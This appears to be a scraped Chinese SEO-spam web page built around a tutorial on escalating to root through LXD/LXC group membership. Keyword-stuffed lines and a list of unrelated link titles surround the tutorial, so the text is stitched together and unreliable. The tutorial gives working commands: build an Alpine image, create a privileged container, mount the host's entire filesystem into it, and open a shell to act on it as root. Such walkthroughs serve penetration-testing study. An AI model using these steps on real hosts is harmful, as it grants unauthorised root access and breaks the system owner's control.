当前位置: 首页 > news >正文

注册餐饮公司流程和费用班级优化大师免费下载电脑版

注册餐饮公司流程和费用,班级优化大师免费下载电脑版,抖音特效开放平台官网,临淄招聘信息最新招聘信息lxd/lxc提权 漏洞介绍 lxd是一个root进程,它可以负责执行任意用户的lxd,unix套接字写入访问操作。而且在一些情况下,lxd不会调用它的用户权限进行检查和匹配 原理可以理解为用用户创建一个容器,再用容器挂载宿主机磁盘&#xf…

lxd/lxc提权

漏洞介绍

lxd是一个root进程,它可以负责执行任意用户的lxd,unix套接字写入访问操作。而且在一些情况下,lxd不会调用它的用户权限进行检查和匹配

原理可以理解为用用户创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果

提权复现

环境:攻击机kali 192.168.31.131 靶机 192.168.31.134

image-20231125152324099

image-20231125152414099

在攻击机kali上操作

通过git将构建好的alpine镜像克隆到本地,并构建

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

然后将自己操作系统对应架构tar文件发送到靶机上

python -m http.server 8848

然后在下载的目录上使用此命令导入镜像

lxc image import ./alpine*.tar.gz --alias myimage 

初始化镜像,一路回车选择默认,不过会有几个显示以及存在default,让你重命名的,选择了就可以

lxd init

可能最后报错,但是也没关系

例如

image-20231125171111579

运行镜像

lxc init myimage mycontainer -c security.privileged=true

将/root挂载到镜像中

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

与镜像交互

lxc start mycontainer
lxc exec mycontainer /bin/sh
lxc start mycontainer
lxc exec mycontainer /bin/sh

image-20231125171236266

http://www.mmbaike.com/news/75137.html

相关文章:

  • 黄骅市属于哪个省乐天seo培训
  • 哈尔滨招投标信息网重庆网页优化seo
  • 怎么样在百度做网站优化网站制作方法大全
  • 开网站开发公司搜索引擎优化方案
  • 沈阳百度关键词推广佛山优化网站关键词
  • 身份证和手机做验证码注册网站seo sem
  • 成都网站建设优秀公司市场运营和市场营销的区别
  • 如何让订阅号菜单做微网站百度点击工具
  • 北京西站类似58的推广平台有哪些平台
  • 南阳企业网站制作兔子bt搜索
  • 上海做网站的公司官网黄金网站app大全
  • wordpress编辑器前端网站优化推广排名
  • 天津做网站价格seo页面优化公司
  • 怎样做淘宝的导购网站如何做企业网页
  • 阿里云网站备案资料网站首页模板
  • 网站开发的例子百度链接收录提交入口
  • 如何建设好高校网站seo免费教程
  • 小男孩与大人做的网站济南优化网站关键词
  • 南京旭光建设监理网站首页2021年关键词排名
  • 与网络公司洽谈做网站需要注意什么网络推广的几种方式
  • 网站服务内容怎样选天眼查询个人
  • 做百度网站排名软件手机端怎么刷排名
  • wordpress 新闻杂志主题百度seo学院
  • 怎么样做网站页面整合网络营销外包
  • 秦皇岛网站制作长沙官网seo推广
  • 西安软件制作公司seo关键词优化哪个平台好
  • 网站建设方案图信息流优化师证书
  • 北京网站建设公司代理知乎关键词优化软件
  • 廊坊做网站的大公司百度怎么投放广告
  • 专门做自助游的网站推广优化网站